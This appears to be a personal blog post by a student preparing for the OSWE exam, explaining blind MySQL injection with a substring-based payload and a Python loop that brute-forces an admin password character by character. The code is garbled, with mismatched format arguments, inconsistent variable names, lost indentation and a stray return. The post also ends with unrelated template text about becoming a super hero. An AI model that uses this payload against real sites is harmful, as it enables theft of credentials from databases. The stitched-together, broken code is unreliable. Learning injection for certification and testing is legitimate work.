Blind MySQL Injection Using Bit Shifting


My AWAE lab just ended today, while I'm having 3 days left to go for the OSWE exam. I've been living under stressful for almost 8 months before the course and during the course as well.

Just a word for OSWE is "amazing", I'd not say much about the course because many ppl out there already sharing about their thoughts in details. The thing I've learnt from AWAE course is MySQL, especially the blind one coz it's more advanced and much harder to extract the data compared to the classic SQLi.

I've been trying to find the fastest way to extract the data from the database in blind SQLi cases. I was wandering around exploit-db paper and finding out an interesting topic that I have not learned yet "Faster Blind MySQL Injection Using Bit Shifting". Read through the paper and I wanted to make a script for this to improve my brute-force mechanism.


Case 1:

The trivial way to get extract the data is using substring or substr function. For example, we have a simple payload

test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='

If it's true, the headers['Content-Length'] will be greater than 20 and otherwise.

Usually, what we do is to brute force every each character of the password in this case, and compare the value of ascii(password) to the ASCII decimal.

Type: man ascii

The decimal set of ascii

So the python code should be

for i in range(1, 8):
injection_string = "test' or (ascii(substring((select password from admin),%d,1)))=[CHAR] or 1='" % (inj,i)
for j in range(32, 126): #every possible character in the ASCII printable set
target = "http://kubertu/index_public.php?q=%s" % (ip, inj_str.replace("[CHAR]", str(j)))
r = requests.get(target)
content_length = int(r.headers['Content-Length'])
if (content_length > 20):
return j

Becoming a super hero is a fairly straight forward process:

$ give me super-powers

Super-powers are granted randomly so please submit an issue if you're not happy with yours.

Once you're strong enough, save the world:
# Ain't no code for that yet, sorry
echo 'You got to trust me on this, I saved the world'